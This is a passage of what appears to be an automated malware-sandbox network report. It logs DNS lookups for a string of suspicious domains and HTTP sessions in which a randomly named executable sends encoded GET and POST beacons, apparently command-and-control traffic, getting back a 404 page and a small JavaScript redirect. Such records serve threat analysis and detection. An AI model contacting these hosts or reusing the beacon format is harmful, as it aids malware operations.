                                                          Nov 20, 2024 10:16:56.947345018 CET6137653192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:16:56.995421886 CET53613761.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:17:12.691855907 CET5419753192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:17:13.250477076 CET53541971.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:17:26.940462112 CET5280353192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:17:27.400295973 CET53528031.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:01.502657890 CET5569553192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:01.712929964 CET53556951.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:15.283838034 CET6007153192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:15.350218058 CET53600711.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:28.658956051 CET5740053192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:29.654819012 CET5740053192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:30.026329041 CET53574001.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:30.026336908 CET53574001.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:43.314841032 CET6308053192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:43.447022915 CET53630801.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:18:57.206027031 CET5257953192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:18:57.231374979 CET53525791.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:19:10.783232927 CET5619453192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:19:10.822206974 CET53561941.1.1.1192.168.2.7
                                                          Nov 20, 2024 10:19:24.111958027 CET5203653192.168.2.71.1.1.1
                                                          Nov 20, 2024 10:19:24.153429985 CET53520361.1.1.1192.168.2.7
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 20, 2024 10:16:56.947345018 CET192.168.2.71.1.1.10x4cccStandard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:12.691855907 CET192.168.2.71.1.1.10xac56Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:26.940462112 CET192.168.2.71.1.1.10xd31Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:01.502657890 CET192.168.2.71.1.1.10x2cc3Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:15.283838034 CET192.168.2.71.1.1.10x84a7Standard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:28.658956051 CET192.168.2.71.1.1.10x9bfbStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:29.654819012 CET192.168.2.71.1.1.10x9bfbStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:43.314841032 CET192.168.2.71.1.1.10xc87bStandard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:57.206027031 CET192.168.2.71.1.1.10x1c7cStandard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:19:10.783232927 CET192.168.2.71.1.1.10x2613Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:19:24.111958027 CET192.168.2.71.1.1.10x16d2Standard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 20, 2024 10:16:56.995421886 CET1.1.1.1192.168.2.70x4cccNo error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:13.250477076 CET1.1.1.1192.168.2.70xac56No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Nov 20, 2024 10:17:13.250477076 CET1.1.1.1192.168.2.70xac56No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:13.250477076 CET1.1.1.1192.168.2.70xac56No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:13.250477076 CET1.1.1.1192.168.2.70xac56No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:13.250477076 CET1.1.1.1192.168.2.70xac56No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:17:27.400295973 CET1.1.1.1192.168.2.70xd31No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:01.712929964 CET1.1.1.1192.168.2.70x2cc3No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 20, 2024 10:18:01.712929964 CET1.1.1.1192.168.2.70x2cc3No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 20, 2024 10:18:01.712929964 CET1.1.1.1192.168.2.70x2cc3No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:15.350218058 CET1.1.1.1192.168.2.70x84a7No error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:30.026329041 CET1.1.1.1192.168.2.70x9bfbNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:30.026329041 CET1.1.1.1192.168.2.70x9bfbNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:30.026336908 CET1.1.1.1192.168.2.70x9bfbNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:30.026336908 CET1.1.1.1192.168.2.70x9bfbNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:43.447022915 CET1.1.1.1192.168.2.70xc87bNo error (0)www.rgenerousrs.store188.114.97.3A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:43.447022915 CET1.1.1.1192.168.2.70xc87bNo error (0)www.rgenerousrs.store188.114.96.3A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:18:57.231374979 CET1.1.1.1192.168.2.70x1c7cNo error (0)www.t91rl7.pro154.88.22.110A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:19:10.822206974 CET1.1.1.1192.168.2.70x2613No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                          Nov 20, 2024 10:19:24.153429985 CET1.1.1.1192.168.2.70x16d2Server failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                          • www.nb-shenshi.buzz
                                                          • www.laohub10.net
                                                          • www.xcvbj.asia
                                                          • www.soainsaat.xyz
                                                          • www.amayavp.xyz
                                                          • www.vayui.top
                                                          • www.rgenerousrs.store
                                                          • www.t91rl7.pro
                                                          • www.learnwithus.site
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.749894161.97.168.245801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:16:57.024030924 CET515OUTGET /xxr1/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65jhjGZAAT78l+Ifn2gDFJzuFUwvVAtXhX1SyzqClfnAxq+DygikL15ul HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.nb-shenshi.buzz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:16:57.621364117 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:16:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cd104a-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                          Nov 20, 2024 10:16:57.621500015 CET224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                          Nov 20, 2024 10:16:57.621515036 CET1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                                          Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                          Nov 20, 2024 10:16:57.621532917 CET474INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                                          Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.74997027.124.4.246801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:13.276117086 CET766OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 37 66 6a 63 31 51 67 6b 63 67 51 66 6c 4c 41 6b 79 7a 56 79 58 62 44 6e 65 33 6b 4a 78 2b 56 59 48 4e 78 65 46 41 66 6a 32 55 51 49 6e 4e 36 56 77 3d 3d
                                                          Data Ascii: T0_8iD=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe7fjc1QgkcgQflLAkyzVyXbDne3kJx+VYHNxeFAfj2UQInN6Vw==
                                                          Nov 20, 2024 10:17:14.157342911 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.74997127.124.4.246801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:15.821557999 CET786OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 34 6a 63 54 53 65 58 6a 67 61 47 4a 70 54 6e 30 2b 38 42 78 36 46 31 73 2b 44 44 73 34 33 4d 54 53 43 67 2f 2b 77 37 6d 64 30 5a 45 42 52 36 6f 3d
                                                          Data Ascii: T0_8iD=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGj4jcTSeXjgaGJpTn0+8Bx6F1s+DDs43MTSCg/+w7md0ZEBR6o=
                                                          Nov 20, 2024 10:17:16.640511990 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.74997227.124.4.246801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:17:18.369436979 CET1799OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 6a 37 67 34 56 6e 63 38 71 65 72 57 55 54 31 53 46 70 70 53 31 6c 65 34 79 78 46 46 45 34 67 46 45 64 41 6c 63 7a 33 4c 30 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2b 52 45 5a 43 5a 64 4d 50 2b 36 65 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 52 52 [TRUNCATED]
                                                          Data Ascii: T0_8iD=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8coRHkPnkj7g4Vnc8qerWUT1SFppS1le4yxFFE4gFEdAlcz3L0fW+vH5vsIxN/3TRzOjmlY2noZpbHH60qM1Tvl2mMJ/lIahjCsLeZ78uEShQ9lD+REZCZdMP+6e6VLYXb4I/BaUCl/sJEtCxn2MWT12vt158uNkSRRsoDIuAYXTHq8wi+RtikKYlVcAFtdIfvl3K2pKNWTnEw8UcY4VhS0CYy7OlshfHgArW9u4saxfYEKBS89kz0lUzl2xZ6QnwbHJrwaZgetFAU4gl1Lt+xn/RaedHbT4+jMvRqIj0gQhTgfref3qPNUPoKMaRcFmqkNZYU0o/2xGlY1a5BTwlKVevh6pEK/zKjUBfBoQx783+44iubtVTU3fM9XmjeA/TE30sev4Cunk4tgWMZ8EjCMKVw8yMz9Zg3ZiS9RDhPkPIE6jbauM5GJwxA2LVvPziASWwQ66sc5zT1lVBRKNGvjpaWlq/dZxO211sEISuNDCbsk19EA6qc0LxDW3877RIOu2IcXazDtVEVH3TAzOoku/X+cXe5giRqhs3BkIlffSuz0qKMH+lDWerxE6fzKDmw91WE8SrnsI1O8xYwYAMopAdAt2eT6FwzrOJMaGjCo1oHcMemZa4aTWbSu0hMf9bm+6zVwndHoxztqscVd09RgLgiBabZgcq7UXoaQn40TnC3TjqFiFG9X9Yu5OyMYpPUuRa8GewfcI3HKlSQo6QIRzwmnZFDn6oQJK/bNYPIlQlH13LQl0U8NaXVVoPZ2GS8eZl1kngcZ3eg2JyorhrSadJs9NMS0FaW64cr2PVkGUCRv3LCvr/P4QlaOzd69oAStAq [TRUNCATED]
                                                          Nov 20, 2024 10:17:19.189469099 CET525INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
